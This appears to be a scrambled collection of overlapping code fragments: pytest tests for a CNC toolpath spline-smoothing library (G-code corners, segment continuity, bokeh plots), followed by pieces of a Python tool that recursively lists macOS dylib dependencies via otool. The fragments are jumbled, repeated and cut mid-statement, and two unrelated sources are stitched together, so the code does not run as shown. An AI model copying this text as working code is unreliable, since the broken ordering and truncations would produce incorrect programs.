"end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start)",
"s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2])",
"spline start distance does not match\" if line <= 1.0: line_dist = self.start_line_dist",
"l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300,",
"generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert",
"== \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l,",
"+ np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100",
"current segment start do not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid,",
"err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\",
"def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01)",
"1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1",
"import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path =",
"== pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity",
"corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point",
"\"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"segment start do not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\",
"* import numpy as np import scipy as sp import vibration_compensation.bokeh_imports as plt",
"== pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start point of",
"X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\")",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2,",
"point of the spline segment is not on the line\" def check_end_point_on(self): assert",
"X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\",",
"self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of the spline segment",
"\"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start == \"start\" and",
"10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 +",
"\"Invalid start type\" if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else:",
"start point of the spline segment does not match the line start point\"",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100",
"distance and the current segment start do not match up\" def check_corner_spline_order(self): assert",
"checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start,",
"lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5 +",
"+ np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data)",
"line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The",
"1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start",
"end point of the spline segment is not on the line\" def check_end_point_on(self):",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0,",
"l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\",",
"X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\",
"def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True,",
"\"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\",",
"self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist +",
"endpoint of the corner spline is before the line segment end\" corner_error =",
"1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid =",
"\"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01)",
"== \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and the current",
"SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif",
"X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\")",
"check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\",",
"s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert",
"corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3,",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\",
"self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy",
"pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data =",
"= self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg =",
"= \"The middle point of the spline segment is not on the middle",
"l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data)",
"2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"= \"The start point of the spline segment is not on the middle",
"pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1",
"np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\",",
"\"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else:",
"self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid =",
"\"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data,",
"l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter):",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1",
"generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2",
"points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p)",
"distance does not match\" if line <= 1.0: line_dist = self.start_line_dist + self.line_length",
"not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0,",
"0.5) def check_line_start_point_end(self): msg = \"The start point of the spline segment is",
"self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment does not end where",
"segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\",
"mid = (lineb - linea) * 0.5 + linea return np.linalg.norm(point - mid)",
"line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point",
"np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([",
"data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\")",
"l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1)",
"= SegmentChecker(data, l, s, start, end, False) if start == \"start\": checker.check_start_point_start() elif",
"end\" corner_error = \"The closest point of the corner is not close enough\"",
"\"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100",
"1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid,",
"SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle =",
"== \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data =",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 +",
"\"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end == \"on\":",
"the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment",
"end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data",
"l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\",",
"start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50,",
"== 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert",
"end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50])",
"plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ],",
"\\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and",
"Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"# Note that this line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\")",
"end): checker = SegmentChecker(data, l, s, start, end, False) if start == \"start\":",
"X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end point of",
"== \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t",
"<= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg",
"= data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l",
"== pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point",
"- point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb",
"does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def",
"end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data,",
"1.5) def check_continuity(self): msg = \"There's a discontinuity at the end of the",
"line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def",
"def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01)",
"checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert",
"\"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data,",
"+ np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data)",
"np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([",
"SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity at the end",
"self.spline_mid, \\ \"The endpoint of the corner spline is before the line segment",
"generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"\"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0],",
"point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb)",
"of the corner spline is before the line segment end\" corner_error = \"The",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"== pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point",
"self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error",
"checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity()",
"import pytest from numpy.testing import * import numpy as np import scipy as",
"\\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([",
"data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea",
"pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and the current segment start",
"start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data =",
"- 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline,",
"10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1)",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\",",
"msg = \"There's a discontinuity at the end of the spline segment\" if",
"not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\",
"previous segment does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg)",
"np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid =",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb -",
"start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line is",
"point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg =",
"end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle()",
"on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12),",
"l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\",",
"abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30",
"end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end == \"middle\":",
"end, False) if start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif",
"= end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] -",
"= xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length",
"straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert",
"type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10))",
"prev_end == self.spline_start, \\ \"The previous segment does not end where the current",
"data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000,",
"figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0]",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\")",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data",
"X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"\\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([",
"if start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start ==",
"self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) ==",
"\"The previous segment end distance and the current segment start do not match",
"end, corner): self.data = data self.s = s self.start = start self.end =",
"- data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0]",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data)",
"np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths)",
"enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def",
"np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"if line <= 1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist",
"0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0],",
"line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def",
"* 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l,",
"Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0,",
"err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point of the spline",
"start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300,",
"x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts",
"p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name )",
"self.data = data self.s = s self.start = start self.end = end self.start_point",
"\\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point of the",
"= data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\"",
"+ self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l])",
"= \"The end point of the spline segment is not on the line\"",
"\"The previous segment does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start),"
] |
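The two geometry helpers carry every assertion in the suite above, so it is worth seeing what they actually measure. A minimal sketch, assuming `point_on_line` and `point_on_middle_of_line` as defined above are in scope; the sample points are illustrative, not from the original tests:

import numpy as np

a = np.array([0.0, 0.0])
b = np.array([10.0, 0.0])

# On the segment: the two partial distances sum to the segment length,
# so the triangle-inequality surplus is zero.
assert abs(point_on_line(a, b, np.array([4.0, 0.0]))) < 1e-12

# Off the segment: the detour through the point adds positive length
# (here 5 + sqrt(45) - 10, about 1.7).
assert point_on_line(a, b, np.array([4.0, 3.0])) > 1.0

# Exactly at the midpoint of a-b.
assert point_on_middle_of_line(a, b, np.array([5.0, 0.0])) == 0.0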
# --- Reassembled from the overlapping n-gram fragments of the second
# --- listing: a recursive Mach-O dynamic-library scanner built on otool.
import subprocess
import threading
from collections import defaultdict
from concurrent.futures import Executor
from concurrent.futures.thread import ThreadPoolExecutor


class RecursiveLibraryScanner:
    def __init__(self, executor: Executor, scan_private: bool):
        self.executor = executor
        self.libraries = defaultdict(set)  # target -> direct dependencies
        self.scanned = set()
        self.scan_private = scan_private
        self.jobs = []
        self.all_done = threading.Event()

    def _check(self, job):
        # Runs after each job; the scan is over once every job has finished.
        if all(j.done() for j in self.jobs):
            self.all_done.set()

    def _enqueue(self, target):
        job = self.executor.submit(self._scan, target)
        job.add_done_callback(self._check)
        self.jobs.append(job)

    def _scan(self, target):
        # print("scanning", target, file=sys.stderr)
        self.scanned.add(target)
        for lib in scan_libraries(target):
            self.libraries[target].add(lib)
            if lib not in self.scanned:
                is_private = smells_private(lib)
                if (is_private and self.scan_private) or not is_private:
                    self._enqueue(lib)

    def scan(self, target):
        self._enqueue(target)
        self.all_done.wait()
        return self.libraries


def scan_libraries_recursive(initial_target, scan_private=True):
    with ThreadPoolExecutor() as executor:
        rls = RecursiveLibraryScanner(executor, scan_private=scan_private)
        return rls.scan(initial_target)


def scan_libraries(target):
    # Parse `otool -l` output: each LC_LOAD_DYLIB load command carries the
    # dependency's install name on a following "name ..." line.
    in_load_dylib = False
    libraries = set()
    for line in subprocess.check_output(
            ["otool", "-l", target], encoding="utf-8").splitlines():
        line = line.strip()
        if line == "cmd LC_LOAD_DYLIB":
            in_load_dylib = True
        if in_load_dylib and line.startswith("name "):
            words = line.split()
            lib = words[1]
            libraries.add(lib)
            in_load_dylib = False
    return libraries


def smells_private(lib):
    if lib.startswith("/System/Library"):
        return True
    if lib.startswith("/usr/lib/"):
        return True
    if lib.startswith("/usr/local/lib/"):
        return True
    return False


def filter_private(scanned_libraries):
    public_libraries = {
        target: {lib for lib in libraries if not smells_private(lib)}
        for (target, libraries) in scanned_libraries.items()
        if not smells_private(target)
    }
    return public_libraries
